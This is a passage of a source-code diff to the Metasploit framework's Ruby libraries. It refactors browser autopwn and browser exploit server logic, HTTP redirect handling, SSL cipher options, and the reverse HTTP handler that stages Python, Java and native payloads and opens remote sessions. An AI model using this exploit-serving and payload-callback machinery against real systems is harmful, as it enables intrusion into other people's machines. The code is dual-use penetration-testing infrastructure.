xploit.datastore['JsObfuscate'] = datastore['JsObfuscate'] if datastore['JsObfuscate']
|
||||
xploit.datastore['CookieName'] = datastore['CookieName'] if datastore['CookieName']
|
||||
xploit.datastore['VERBOSE'] = datastore['VERBOSE'] if datastore['VERBOSE']
|
||||
xploit.datastore['Retries'] = datastore['Retries'] if datastore['Retries']
|
||||
xploit.datastore['SSL'] = datastore['SSL'] if datastore['SSL']
|
||||
xploit.datastore['SSLVersion'] = datastore['SSLVersion'] if datastore['SSLVersion']
|
||||
xploit.datastore['URIHOST'] = datastore['URIHOST'] if datastore['URIHOST']
|
||||
xploit.datastore['URIPORT'] = datastore['URIPORT'] if datastore['URIPORT']
|
||||
xploit.datastore['LHOST'] = get_payload_lhost
|
||||
|
||||
%w(JsObfuscate CookieName VERBOSE Retries SSL SSLVersion SSLCipher URIHOST URIPORT).each do |opt|
|
||||
xploit.datastore[opt] = datastore[opt] if datastore[opt]
|
||||
end
|
||||
|
||||
# Set options only configurable by BAP.
|
||||
xploit.datastore['DisablePayloadHandler'] = true
|
||||
xploit.datastore['BrowserProfilePrefix'] = browser_profile_prefix
|
||||
|
@ -325,22 +321,14 @@ module Msf
|
|||
multi_handler.datastore['LHOST'] = get_payload_lhost
|
||||
multi_handler.datastore['PAYLOAD'] = payload_name
|
||||
multi_handler.datastore['LPORT'] = wanted[:payload_lport]
|
||||
multi_handler.datastore['DebugOptions'] = datastore['DebugOptions'] if datastore['DebugOptions']
|
||||
multi_handler.datastore['AutoLoadAndroid'] = datastore['AutoLoadAndroid'] if datastore['AutoLoadAndroid']
|
||||
multi_handler.datastore['PrependMigrate'] = datastore['PrependMigrate'] if datastore['PrependMigrate']
|
||||
multi_handler.datastore['PrependMigrateProc'] = datastore['PrependMigrateProc'] if datastore['PrependMigrateProc']
|
||||
multi_handler.datastore['InitialAutoRunScript'] = datastore['InitialAutoRunScript'] if datastore['InitialAutoRunScript']
|
||||
multi_handler.datastore['AutoRunScript'] = datastore['AutoRunScript'] if datastore['AutoRunScript']
|
||||
multi_handler.datastore['CAMPAIGN_ID'] = datastore['CAMPAIGN_ID'] if datastore['CAMPAIGN_ID']
|
||||
multi_handler.datastore['HandlerSSLCert'] = datastore['HandlerSSLCert'] if datastore['HandlerSSLCert']
|
||||
multi_handler.datastore['StagerVerifySSLCert'] = datastore['StagerVerifySSLCert'] if datastore['StagerVerifySSLCert']
|
||||
multi_handler.datastore['PayloadUUIDTracking'] = datastore['PayloadUUIDTracking'] if datastore['PayloadUUIDTracking']
|
||||
multi_handler.datastore['PayloadUUIDName'] = datastore['PayloadUUIDName'] if datastore['PayloadUUIDName']
|
||||
multi_handler.datastore['IgnoreUnknownPayloads'] = datastore['IgnoreUnknownPayloads'] if datastore['IgnoreUnknownPayloads']
|
||||
multi_handler.datastore['SessionRetryTotal'] = datastore['SessionRetryTotal'] if datastore['SessionRetryTotal']
|
||||
multi_handler.datastore['SessionRetryWait'] = datastore['SessionRetryWait'] if datastore['SessionRetryWait']
|
||||
multi_handler.datastore['SessionExpirationTimeout'] = datastore['SessionExpirationTimeout'] if datastore['SessionExpirationTimeout']
|
||||
multi_handler.datastore['SessionCommunicationTimeout'] = datastore['SessionCommunicationTimeout'] if datastore['SessionCommunicationTimeout']
|
||||
|
||||
%w(DebugOptions AutoLoadAndroid PrependMigrate PrependMigrateProc
|
||||
InitialAutoRunScript AutoRunScript CAMPAIGN_ID HandlerSSLCert
|
||||
StagerVerifySSLCert PayloadUUIDTracking PayloadUUIDName
|
||||
IgnoreUnknownPayloads SessionRetryTotal SessionRetryWait
|
||||
SessionExpirationTimeout SessionCommunicationTimeout).each do |opt|
|
||||
multi_handler.datastore[opt] = datastore[opt] if datastore[opt]
|
||||
end
|
||||
|
||||
# Configurable only by BAP
|
||||
multi_handler.datastore['ExitOnSession'] = false
|
||||
|
@ -409,8 +397,8 @@ module Msf
|
|||
# Checks if the module is multi-platform based on the directory path.
|
||||
#
|
||||
# @param m [Object] Module.
|
||||
# @return Module [TrueClass] is multi-platform.
|
||||
# @return Module [FalseClass] is not multi-platform.
|
||||
# @return [TrueClass] is multi-platform.
|
||||
# @return [FalseClass] is not multi-platform.
|
||||
def is_multi_platform_exploit?(m)
|
||||
m.fullname.include?('multi/')
|
||||
end
|
||||
|
@ -703,7 +691,7 @@ module Msf
|
|||
def on_request_uri(cli, request)
|
||||
# Check if target is on our whitelist
|
||||
if @whitelist && !is_ip_targeted?(cli.peerhost)
|
||||
print_status("Client is trying to connect but not on our whitelist.")
|
||||
print_status("Client #{cli.peerhost} is trying to connect but not on our whitelist.")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
@ -767,7 +755,7 @@ module Msf
|
|||
return datastore['HTMLContent']
|
||||
end
|
||||
elsif exploit_list.empty?
|
||||
print_status("No suitable exploits to send.")
|
||||
print_status("No suitable exploits to send for #{cli.peerhost}")
|
||||
if datastore['HTMLContent'].blank?
|
||||
send_not_found(cli)
|
||||
return ''
|
||||
|
|
|
@ -110,7 +110,7 @@ module Msf
|
|||
cap = datastore['PCAPFILE'] || ''
|
||||
|
||||
if (not cap.empty?)
|
||||
if (not File.exists?(cap))
|
||||
if (not File.exist?(cap))
|
||||
raise RuntimeError, "The PCAP file #{cap} could not be found"
|
||||
end
|
||||
self.capture = ::Pcap.open_offline(cap)
|
||||
|
@ -216,7 +216,7 @@ module Msf
|
|||
raise RuntimeError, "Could not access the capture process (remember to open_pcap first!)"
|
||||
end
|
||||
|
||||
if (not File.exists?(pcap_file))
|
||||
if (not File.exist?(pcap_file))
|
||||
raise RuntimeError, "The PCAP file #{pcap_file} could not be found"
|
||||
end
|
||||
|
||||
|
|
|
@ -1,4 +1,5 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'uri'
|
||||
require 'digest'
|
||||
require 'rex/proto/ntlm/crypt'
|
||||
|
@ -370,24 +371,47 @@ module Exploit::Remote::HttpClient
|
|||
return res unless res && res.redirect? && redirect_depth > 0
|
||||
|
||||
redirect_depth -= 1
|
||||
location = res.redirection
|
||||
return res if location.nil?
|
||||
|
||||
opts['redirect_uri'] = location
|
||||
opts['uri'] = location.path
|
||||
opts['rhost'] = location.host
|
||||
opts['vhost'] = location.host
|
||||
opts['rport'] = location.port
|
||||
|
||||
if location.scheme == 'https'
|
||||
opts['ssl'] = true
|
||||
else
|
||||
opts['ssl'] = false
|
||||
end
|
||||
return res if res.redirection.nil?
|
||||
|
||||
reconfig_redirect_opts!(res, opts)
|
||||
send_request_cgi!(opts, actual_timeout, redirect_depth)
|
||||
end
|
||||
|
||||
|
||||
# Modifies the HTTP request options for a redirection.
|
||||
#
|
||||
# @param res [Rex::Proto::HTTP::Response] HTTP Response.
|
||||
# @param opts [Hash] The HTTP request options to modify.
|
||||
# @return [void]
|
||||
def reconfig_redirect_opts!(res, opts)
|
||||
location = res.redirection
|
||||
|
||||
if location.relative?
|
||||
parent_path = File.dirname(opts['uri'].to_s)
|
||||
parent_path = '/' if parent_path == '.'
|
||||
new_redirect_uri = normalize_uri(parent_path, location.path.gsub(/^\./, ''))
|
||||
opts['redirect_uri'] = new_redirect_uri
|
||||
opts['uri'] = new_redirect_uri
|
||||
opts['rhost'] = datastore['RHOST']
|
||||
opts['vhost'] = opts['vhost'] || opts['rhost'] || self.vhost()
|
||||
opts['rport'] = datastore['RPORT']
|
||||
|
||||
opts['ssl'] = ssl
|
||||
else
|
||||
opts['redirect_uri'] = location
|
||||
opts['uri'] = location.path
|
||||
opts['rhost'] = location.host
|
||||
opts['vhost'] = location.host
|
||||
opts['rport'] = location.port
|
||||
|
||||
if location.scheme == 'https'
|
||||
opts['ssl'] = true
|
||||
else
|
||||
opts['ssl'] = false
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Combine the user/pass into an auth string for the HTTP Client
|
||||
#
|
||||
|
|
|
@ -144,7 +144,8 @@ module Exploit::Remote::HttpServer
|
|||
},
|
||||
opts['Comm'],
|
||||
datastore['SSLCert'],
|
||||
datastore['SSLCompression']
|
||||
datastore['SSLCompression'],
|
||||
datastore['SSLCipher']
|
||||
)
|
||||
|
||||
self.service.server_name = datastore['HTTP::server_name']
|
||||
|
|
|
@ -47,7 +47,7 @@ module Exploit::Java
|
|||
end
|
||||
|
||||
toolsjar = File.join(ENV['JAVA_HOME'], "lib", "tools.jar")
|
||||
if (not File.exists? toolsjar)
|
||||
if (not File.exist? toolsjar)
|
||||
raise RuntimeError, 'JAVA_HOME does not point to a valid JDK installation.'
|
||||
end
|
||||
|
||||
|
@ -69,7 +69,7 @@ module Exploit::Java
|
|||
def save_to_file(classnames, codez, location)
|
||||
path = File.join( Msf::Config.install_root, "external", "source", location )
|
||||
|
||||
if not File.exists? path
|
||||
if not File.exist? path
|
||||
Dir.mkdir(path)
|
||||
end
|
||||
|
||||
|
@ -96,7 +96,7 @@ module Exploit::Java
|
|||
compile_options = [] if compile_options.nil?
|
||||
|
||||
# Create the directory if it doesn't exist
|
||||
Dir.mkdir(datastore['JavaCache']) if !File.exists? datastore['JavaCache']
|
||||
Dir.mkdir(datastore['JavaCache']) if !File.exist? datastore['JavaCache']
|
||||
|
||||
# For compatibility, some exploits need to have the target and source version
|
||||
# set to a previous JRE version.
|
||||
|
@ -157,7 +157,7 @@ module Exploit::Java
|
|||
|
||||
# Check if the keystore exists from previous run. If it does, delete it.
|
||||
msf_keystore = File.join(datastore['JavaCache'], msf_keystore)
|
||||
File.delete msf_keystore if File.exists? msf_keystore
|
||||
File.delete msf_keystore if File.exist? msf_keystore
|
||||
|
||||
# Rjb pukes on a CN with a comma in it so bad that it crashes to shell
|
||||
# and turns input echoing off. Simple fix for this ugly bug is
|
||||
|
|
|
@ -298,7 +298,9 @@ module Exploit::Remote::Postgres
|
|||
when "Fauth.c:L302:Rauth_failed" ; return {:preauth => "9.1.6"} # Bad password, good database
|
||||
when "Fpostinit.c:L718:RInitPostgres" ; return {:preauth => "9.1.6"} # Good creds, non-existent but allowed database
|
||||
when "Fauth.c:L483:RClientAuthentication" ; return {:preauth => "9.1.6"} # Bad user
|
||||
when "Fmiscinit.c:L362:RInitializeSessionUserId" ; return {:preauth => "9.4.1-5"} # Bad user
|
||||
when "Fauth.c:L285:Rauth_failed" ; return {:preauth => "9.4.1-5"} # Bad creds, good database
|
||||
when "Fpostinit.c:L794:RInitPostgres" ; return {:preauth => "9.4.1-5"} # Good creds, non-existent but allowed database
|
||||
when "Fauth.c:L481:RClientAuthentication" ; return {:preauth => "9.4.1-5"} # bad user or host
|
||||
|
||||
# Windows
|
||||
|
|
|
@ -73,10 +73,10 @@ module Msf
|
|||
'vuln_test', # Example: "if(window.MyComponentIsInstalled)return true;",
|
||||
# :activex is a special case.
|
||||
# When you set this requirement in your module, this is how it should be:
|
||||
# [{:clsid=>'String', :method=>'String'}]
|
||||
# [:clsid=>'String', :method=>'String']
|
||||
# Where each Hash is a test case
|
||||
# But when BES receives this information, the JavaScript will return this format:
|
||||
# "{CLSID}=>Method=>Boolean;"
|
||||
# "CLSID=>Method=>Boolean;"
|
||||
# Also see: #has_bad_activex?
|
||||
'activex'
|
||||
])
|
||||
|
@ -216,7 +216,7 @@ module Msf
|
|||
|
||||
# Returns true if there's a bad ActiveX, otherwise false.
|
||||
# @param ax [String] The raw activex the JavaScript detection will return in this format:
|
||||
# "{CLSID}=>Method=>Boolean;"
|
||||
# "CLSID=>Method=>Boolean;"
|
||||
# @return [Boolean] True if there's a bad ActiveX, otherwise false
|
||||
def has_bad_activex?(ax)
|
||||
ax.to_s.split(';').each do |a|
|
||||
|
@ -271,12 +271,12 @@ module Msf
|
|||
|
||||
if tag.blank?
|
||||
# Browser probably doesn't allow cookies, plan B :-/
|
||||
vprint_status("No cookie received, resorting to headers hash.")
|
||||
vprint_status("No cookie received for #{cli.peerhost}, resorting to headers hash.")
|
||||
ip = cli.peerhost
|
||||
os = request.headers['User-Agent']
|
||||
tag = Rex::Text.md5("#{ip}#{os}")
|
||||
else
|
||||
vprint_status("Received cookie '#{tag}'.")
|
||||
vprint_status("Received cookie '#{tag}' from #{cli.peerhost}")
|
||||
end
|
||||
|
||||
tag
|
||||
|
@ -303,7 +303,7 @@ module Msf
|
|||
when :script
|
||||
# Gathers target data from a POST request
|
||||
parsed_body = CGI::parse(Rex::Text.decode_base64(request.body) || '')
|
||||
vprint_status("Received sniffed browser data over POST:")
|
||||
vprint_status("Received sniffed browser data over POST from #{cli.peerhost}")
|
||||
vprint_line("#{parsed_body}.")
|
||||
parsed_body.each { |k, v| profile[k.to_sym] = (v.first == 'null' ? nil : v.first) }
|
||||
found_ua_name = parsed_body['ua_name']
|
||||
|
@ -521,7 +521,7 @@ module Msf
|
|||
if datastore['CookieExpiration'].present?
|
||||
expires_date = (DateTime.now + 365*datastore['CookieExpiration'].to_i)
|
||||
expires_str = expires_date.to_time.strftime("%a, %d %b %Y 12:00:00 GMT")
|
||||
cookie << " Expires=#{expires};"
|
||||
cookie << " Expires=#{expires_str};"
|
||||
end
|
||||
cookie
|
||||
end
|
||||
|
@ -549,15 +549,15 @@ module Msf
|
|||
return
|
||||
end
|
||||
|
||||
print_status("Gathering target information.")
|
||||
print_status("Gathering target information for #{cli.peerhost}")
|
||||
tag = Rex::Text.rand_text_alpha(rand(20) + 5)
|
||||
ua = request.headers['User-Agent'] || ''
|
||||
print_status("Sending HTML response.")
|
||||
print_status("Sending HTML response to #{cli.peerhost}")
|
||||
html = get_detection_html(ua)
|
||||
send_response(cli, html, {'Set-Cookie' => cookie_header(tag)})
|
||||
|
||||
when /#{@flash_swf}/
|
||||
vprint_status("Sending SWF used for Flash detection")
|
||||
vprint_status("Sending SWF used for Flash detection to #{cli.peerhost}")
|
||||
swf = load_swf_detection
|
||||
send_response(cli, swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
|
||||
|
||||
|
@ -565,7 +565,7 @@ module Msf
|
|||
#
|
||||
# The detection code will hit this if Javascript is enabled
|
||||
#
|
||||
vprint_status "Info receiver page called."
|
||||
vprint_status "Info receiver page called from #{cli.peerhost}"
|
||||
process_browser_info(:script, cli, request)
|
||||
send_response(cli, '', {'Set-Cookie' => cookie_header(tag)})
|
||||
|
||||
|
@ -583,13 +583,13 @@ module Msf
|
|||
# on_request_exploit() to get the target information
|
||||
#
|
||||
tag = retrieve_tag(cli, request)
|
||||
vprint_status("Serving exploit to user with tag #{tag}")
|
||||
vprint_status("Serving exploit to user #{cli.peerhost} with tag #{tag}")
|
||||
profile = browser_profile[tag]
|
||||
if profile.nil?
|
||||
print_status("Browsing directly to the exploit URL is forbidden.")
|
||||
print_status("Browsing visiting directly to the exploit URL is forbidden.")
|
||||
send_not_found(cli)
|
||||
elsif profile[:tried] && !datastore['Retries']
|
||||
print_status("Target with tag \"#{tag}\" wants to retry the module, not allowed.")
|
||||
print_status("Target #{cli.peerhost} with tag \"#{tag}\" wants to retry the module, not allowed.")
|
||||
send_not_found(cli)
|
||||
else
|
||||
profile[:tried] = true
|
||||
|
@ -618,7 +618,7 @@ module Msf
|
|||
end
|
||||
|
||||
else
|
||||
print_error("Target has requested an unknown path: #{request.uri}")
|
||||
print_error("Target #{cli.peerhost} has requested an unknown path: #{request.uri}")
|
||||
send_not_found(cli)
|
||||
end
|
||||
end
|
||||
|
|
|
@ -163,8 +163,8 @@ module Exploit::Remote::SMTPDeliver
|
|||
print_error("Server refused our mail")
|
||||
else
|
||||
full_msg = ''
|
||||
full_msg << date
|
||||
full_msg << subject unless subject.nil?
|
||||
full_msg << date unless data =~ /date: /i
|
||||
full_msg << subject unless subject.nil? || data =~ /subject: /i
|
||||
full_msg << data
|
||||
send_status = raw_send_recv("#{full_msg}\r\n.\r\n", nsock)
|
||||
end
|
||||
|
|
|
@ -28,7 +28,8 @@ module Exploit::Remote::TcpServer
|
|||
register_advanced_options(
|
||||
[
|
||||
OptString.new('ListenerComm', [ false, 'The specific communication channel to use for this service']),
|
||||
OptBool.new('SSLCompression', [ false, 'Enable SSL/TLS-level compression', false ])
|
||||
OptBool.new('SSLCompression', [ false, 'Enable SSL/TLS-level compression', false ]),
|
||||
OptString.new('SSLCipher', [ false, 'String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"'])
|
||||
], Msf::Exploit::Remote::TcpServer)
|
||||
|
||||
register_evasion_options(
|
||||
|
@ -108,6 +109,7 @@ module Exploit::Remote::TcpServer
|
|||
'LocalPort' => srvport,
|
||||
'SSL' => ssl,
|
||||
'SSLCert' => ssl_cert,
|
||||
'SSLCipher' => ssl_cipher,
|
||||
'SSLCompression' => ssl_compression,
|
||||
'Comm' => comm,
|
||||
'Context' =>
|
||||
|
@ -195,6 +197,13 @@ module Exploit::Remote::TcpServer
|
|||
datastore['SSLCert']
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the SSLCipher option
|
||||
#
|
||||
def ssl_cipher
|
||||
datastore['SSLCipher']
|
||||
end
|
||||
|
||||
# @return [Bool] enable SSL/TLS-level compression
|
||||
def ssl_compression
|
||||
datastore['SSLCompression']
|
||||
|
|
|
@ -52,7 +52,7 @@ module Msf
|
|||
# @return [Integer]
|
||||
def bind_port
|
||||
port = datastore['ReverseListenerBindPort'].to_i
|
||||
port > 0 ? port : datastore['LPORT'].to_i
|
||||
(port > 0) ? port : datastore['LPORT'].to_i
|
||||
end
|
||||
|
||||
#
|
||||
|
|
|
@ -46,7 +46,8 @@ module ReverseHttp
|
|||
register_options(
|
||||
[
|
||||
OptString.new('LHOST', [true, 'The local listener hostname']),
|
||||
OptPort.new('LPORT', [true, 'The local listener port', 8080])
|
||||
OptPort.new('LPORT', [true, 'The local listener port', 8080]),
|
||||
OptString.new('LURI', [false, 'The HTTP Path', ''])
|
||||
], Msf::Handler::ReverseHttp)
|
||||
|
||||
register_advanced_options(
|
||||
|
@ -71,12 +72,14 @@ module ReverseHttp
|
|||
end
|
||||
end
|
||||
|
||||
# Return a URI suitable for placing in a payload
|
||||
# A URI describing where we are listening
|
||||
#
|
||||
# @param addr [String] the address that
|
||||
# @return [String] A URI of the form +scheme://host:port/+
|
||||
def listener_uri(addr=datastore['LHOST'])
|
||||
def listener_uri(addr=datastore['ReverseListenerBindAddress'])
|
||||
addr = datastore['LHOST'] if addr.nil? || addr.empty?
|
||||
uri_host = Rex::Socket.is_ipv6?(addr) ? "[#{addr}]" : addr
|
||||
"#{scheme}://#{uri_host}:#{bind_port}/"
|
||||
"#{scheme}://#{uri_host}:#{bind_port}#{luri}"
|
||||
end
|
||||
|
||||
# Return a URI suitable for placing in a payload.
|
||||
|
@ -84,29 +87,40 @@ module ReverseHttp
|
|||
# Host will be properly wrapped in square brackets, +[]+, for ipv6
|
||||
# addresses.
|
||||
#
|
||||
# @param req [Rex::Proto::Http::Request]
|
||||
# @return [String] A URI of the form +scheme://host:port/+
|
||||
def payload_uri(req)
|
||||
def payload_uri(req=nil)
|
||||
callback_host = nil
|
||||
|
||||
# Extract whatever the client sent us in the Host header
|
||||
if req && req.headers && req.headers['Host']
|
||||
callback_host = req.headers['Host']
|
||||
callback_host, callback_port = req.headers['Host'].split(":")
|
||||
callback_port = callback_port.to_i
|
||||
callback_port ||= (ssl? ? 443 : 80)
|
||||
end
|
||||
|
||||
# Override the host and port as appropriate
|
||||
if datastore['OverrideRequestHost'] || callback_host.nil?
|
||||
callback_name = datastore['OverrideLHOST'] || datastore['LHOST']
|
||||
callback_port = datastore['OverrideLPORT'] || datastore['LPORT']
|
||||
if Rex::Socket.is_ipv6? callback_name
|
||||
callback_name = "[#{callback_name}]"
|
||||
end
|
||||
callback_host = "#{callback_name}:#{callback_port}"
|
||||
callback_host = datastore['OverrideLHOST']
|
||||
callback_port = datastore['OverrideLPORT']
|
||||
end
|
||||
|
||||
"#{scheme}://#{callback_host}/"
|
||||
if callback_host.nil? || callback_host.empty?
|
||||
callback_host = datastore['LHOST']
|
||||
end
|
||||
|
||||
if callback_port.nil? || callback_port.zero?
|
||||
callback_port = datastore['LPORT']
|
||||
end
|
||||
|
||||
if Rex::Socket.is_ipv6? callback_host
|
||||
callback_host = "[#{callback_host}]"
|
||||
end
|
||||
|
||||
"#{scheme}://#{callback_host}:#{callback_port}"
|
||||
end
|
||||
|
||||
# Use the {#refname} to determine whether this handler uses SSL or not
|
||||
# Use the #refname to determine whether this handler uses SSL or not
|
||||
#
|
||||
def ssl?
|
||||
!!(self.refname.index('https'))
|
||||
|
@ -120,8 +134,31 @@ module ReverseHttp
|
|||
(ssl?) ? 'https' : 'http'
|
||||
end
|
||||
|
||||
# The local URI for the handler.
|
||||
#
|
||||
# @return [String] Representation of the URI to listen on.
|
||||
def luri
|
||||
l = datastore['LURI'] || ""
|
||||
|
||||
if l && l.length > 0
|
||||
# strip trailing slashes
|
||||
while l[-1] == '/'
|
||||
l = l[0...-1]
|
||||
end
|
||||
|
||||
# make sure the luri has the prefix
|
||||
if l[0] != '/'
|
||||
l = "/#{l}"
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
l.dup
|
||||
end
|
||||
|
||||
# Create an HTTP listener
|
||||
#
|
||||
# @return [void]
|
||||
def setup_handler
|
||||
|
||||
local_addr = nil
|
||||
|
@ -154,13 +191,10 @@ module ReverseHttp
|
|||
|
||||
self.service.server_name = datastore['MeterpreterServerName']
|
||||
|
||||
# Create a reference to ourselves
|
||||
obj = self
|
||||
|
||||
# Add the new resource
|
||||
service.add_resource("/",
|
||||
service.add_resource(luri + "/",
|
||||
'Proc' => Proc.new { |cli, req|
|
||||
on_request(cli, req, obj)
|
||||
on_request(cli, req)
|
||||
},
|
||||
'VirtualDirectory' => true)
|
||||
|
||||
|
@ -178,7 +212,7 @@ module ReverseHttp
|
|||
#
|
||||
def stop_handler
|
||||
if self.service
|
||||
self.service.remove_resource('/')
|
||||
self.service.remove_resource(luri + "/")
|
||||
if self.service.resources.empty? && self.sessions == 0
|
||||
Rex::ServiceManager.stop_service(self.service)
|
||||
end
|
||||
|
@ -231,22 +265,25 @@ protected
|
|||
#
|
||||
# Parses the HTTPS request
|
||||
#
|
||||
def on_request(cli, req, obj)
|
||||
def on_request(cli, req)
|
||||
Thread.current[:cli] = cli
|
||||
resp = Rex::Proto::Http::Response.new
|
||||
info = process_uri_resource(req.relative_resource)
|
||||
uuid = info[:uuid] || Msf::Payload::UUID.new
|
||||
|
||||
# Configure the UUID architecture and payload if necessary
|
||||
uuid.arch ||= obj.arch
|
||||
uuid.platform ||= obj.platform
|
||||
uuid.arch ||= self.arch
|
||||
uuid.platform ||= self.platform
|
||||
|
||||
conn_id = nil
|
||||
conn_id = luri
|
||||
if info[:mode] && info[:mode] != :connect
|
||||
conn_id = generate_uri_uuid(URI_CHECKSUM_CONN, uuid)
|
||||
conn_id << generate_uri_uuid(URI_CHECKSUM_CONN, uuid)
|
||||
else
|
||||
conn_id << req.relative_resource
|
||||
conn_id = conn_id.chomp('/')
|
||||
end
|
||||
|
||||
request_summary = "#{req.relative_resource} with UA '#{req.headers['User-Agent']}'"
|
||||
request_summary = "#{conn_id} with UA '#{req.headers['User-Agent']}'"
|
||||
|
||||
# Validate known UUIDs for all requests if IgnoreUnknownPayloads is set
|
||||
if datastore['IgnoreUnknownPayloads'] && ! framework.uuid_db[uuid.puid_hex]
|
||||
|
@ -281,11 +318,11 @@ protected
|
|||
resp.body = pkt.to_r
|
||||
|
||||
when :init_python
|
||||
print_status("Staging Python payload ...")
|
||||
print_status("Staging Python payload...")
|
||||
url = payload_uri(req) + conn_id + '/'
|
||||
|
||||
blob = ""
|
||||
blob << obj.generate_stage(
|
||||
blob << self.generate_stage(
|
||||
http_url: url,
|
||||
http_user_agent: datastore['MeterpreterUserAgent'],
|
||||
http_proxy_host: datastore['PayloadProxyHost'] || datastore['PROXYHOST'],
|
||||
|
@ -298,7 +335,7 @@ protected
|
|||
|
||||
# Short-circuit the payload's handle_connection processing for create_session
|
||||
create_session(cli, {
|
||||
:passive_dispatcher => obj.service,
|
||||
:passive_dispatcher => self.service,
|
||||
:conn_id => conn_id,
|
||||
:url => url,
|
||||
:expiration => datastore['SessionExpirationTimeout'].to_i,
|
||||
|
@ -310,10 +347,10 @@ protected
|
|||
})
|
||||
|
||||
when :init_java
|
||||
print_status("Staging Java payload ...")
|
||||
print_status("Staging Java payload...")
|
||||
url = payload_uri(req) + conn_id + "/\x00"
|
||||
|
||||
blob = obj.generate_stage(
|
||||
blob = self.generate_stage(
|
||||
uuid: uuid,
|
||||
uri: conn_id
|
||||
)
|
||||
|
@ -322,7 +359,7 @@ protected
|
|||
|
||||
# Short-circuit the payload's handle_connection processing for create_session
|
||||
create_session(cli, {
|
||||
:passive_dispatcher => obj.service,
|
||||
:passive_dispatcher => self.service,
|
||||
:conn_id => conn_id,
|
||||
:url => url,
|
||||
:expiration => datastore['SessionExpirationTimeout'].to_i,
|
||||
|
@ -334,7 +371,7 @@ protected
|
|||
})
|
||||
|
||||
when :init_native
|
||||
print_status("Staging Native payload ...")
|
||||
print_status("Staging Native payload...")
|
||||
url = payload_uri(req) + conn_id + "/\x00"
|
||||
uri = URI(payload_uri(req) + conn_id)
|
||||
|
||||
|
@ -343,7 +380,7 @@ protected
|
|||
begin
|
||||
# generate the stage, but pass in the existing UUID and connection id so that
|
||||
# we don't get new ones generated.
|
||||
blob = obj.stage_payload(
|
||||
blob = self.stage_payload(
|
||||
uuid: uuid,
|
||||
uri: conn_id,
|
||||
lhost: uri.host,
|
||||
|
@ -354,7 +391,7 @@ protected
|
|||
|
||||
# Short-circuit the payload's handle_connection processing for create_session
|
||||
create_session(cli, {
|
||||
:passive_dispatcher => obj.service,
|
||||
:passive_dispatcher => self.service,
|
||||
:conn_id => conn_id,
|
||||
:url => url,
|
||||
:expiration => datastore['SessionExpirationTimeout'].to_i,
|
||||
|
@ -370,16 +407,20 @@ protected
|
|||
end
|
||||
|
||||
when :connect
|
||||
print_status("Attaching orphaned/stageless session ...")
|
||||
print_status("Attaching orphaned/stageless session...")
|
||||
|
||||
resp.body = ''
|
||||
conn_id = req.relative_resource
|
||||
|
||||
url = payload_uri(req) + conn_id
|
||||
url << '/' unless url[-1] == '/'
|
||||
|
||||
p url
|
||||
|
||||
# Short-circuit the payload's handle_connection processing for create_session
|
||||
create_session(cli, {
|
||||
:passive_dispatcher => obj.service,
|
||||
:passive_dispatcher => self.service,
|
||||
:conn_id => conn_id,
|
||||
:url => payload_uri(req) + conn_id + "/\x00",
|
||||
:url => url + "\x00",
|
||||
:expiration => datastore['SessionExpirationTimeout'].to_i,
|
||||
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
|
||||
:retry_total => datastore['SessionRetryTotal'].to_i,
|
||||
|
@ -392,16 +433,14 @@ protected
|
|||
unless [:unknown_uuid, :unknown_uuid_url].include?(info[:mode])
|
||||
print_status("Unknown request to #{request_summary}")
|
||||
end
|
||||
resp.code = 200
|
||||
resp.message = 'OK'
|
||||
resp.body = datastore['HttpUnknownRequestResponse'].to_s
|
||||
resp = nil
|
||||
self.pending_connections -= 1
|
||||
end
|
||||
|
||||
cli.send_response(resp) if (resp)
|
||||
|
||||
# Force this socket to be closed
|
||||
obj.service.close_client( cli )
|
||||
self.service.close_client(cli)
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -77,6 +77,10 @@ module ReverseTcp
|
|||
"reverse TCP"
|
||||
end
|
||||
|
||||
def payload_uri
|
||||
"tcp://#{datastore['LHOST']}:#{datastore['LPORT']}"
|
||||
end
|
||||
|
||||
#
|
||||
# Starts monitoring for an inbound connection.
|
||||
#
|
||||
|
|
|
@ -183,8 +183,8 @@ class Msf::ModuleSet < Hash
|
|||
# @option info [Array<String>] 'files' List of paths to files that defined
|
||||
# +klass+.
|
||||
# @return [Class] The klass parameter modified to have
|
||||
# {Msf::Module#framework}, {Msf::Module#refname}, {Msf::Module#file_path},
|
||||
# and {Msf::Module#orig_cls} set.
|
||||
# Msf::Module.framework, Msf::Module#refname, Msf::Module#file_path,
|
||||
# and Msf::Module#orig_cls set.
|
||||
def add_module(klass, reference_name, info = {})
|
||||
# Set the module's reference_name so that it can be referenced when
|
||||
# instances are created.
|
||||
|
|
|
@ -12,8 +12,8 @@ class OptAddress < OptBase
|
|||
return 'address'
|
||||
end
|
||||
|
||||
def valid?(value)
|
||||
return false if empty_required_value?(value)
|
||||
def valid?(value, check_empty: true)
|
||||
return false if check_empty && empty_required_value?(value)
|
||||
return false unless value.kind_of?(String) or value.kind_of?(NilClass)
|
||||
|
||||
if (value != nil and value.empty? == false)
|
||||
|
|
|
@ -20,7 +20,7 @@ class OptAddressRange < OptBase
|
|||
return nil unless value.kind_of?(String)
|
||||
if (value =~ /^file:(.*)/)
|
||||
path = $1
|
||||
return false if not File.exists?(path) or File.directory?(path)
|
||||
return false if not File.exist?(path) or File.directory?(path)
|
||||
return File.readlines(path).map{ |s| s.strip}.join(" ")
|
||||
elsif (value =~ /^rand:(.*)/)
|
||||
count = $1.to_i
|
||||
|
@ -35,8 +35,8 @@ class OptAddressRange < OptBase
|
|||
return value
|
||||
end
|
||||
|
||||
def valid?(value)
|
||||
return false if empty_required_value?(value)
|
||||
def valid?(value, check_empty: true)
|
||||
return false if check_empty && empty_required_value?(value)
|
||||
return false unless value.kind_of?(String) or value.kind_of?(NilClass)
|
||||
|
||||
if (value != nil and value.empty? == false)
|
||||
|
|
|
@ -85,17 +85,13 @@ module Msf
|
|||
#
|
||||
# If it's required and the value is nil or empty, then it's not valid.
|
||||
#
|
||||
def valid?(value)
|
||||
if required?
|
||||
def valid?(value, check_empty: true)
|
||||
if check_empty && required?
|
||||
# required variable not set
|
||||
return false if (value == nil or value.to_s.empty?)
|
||||
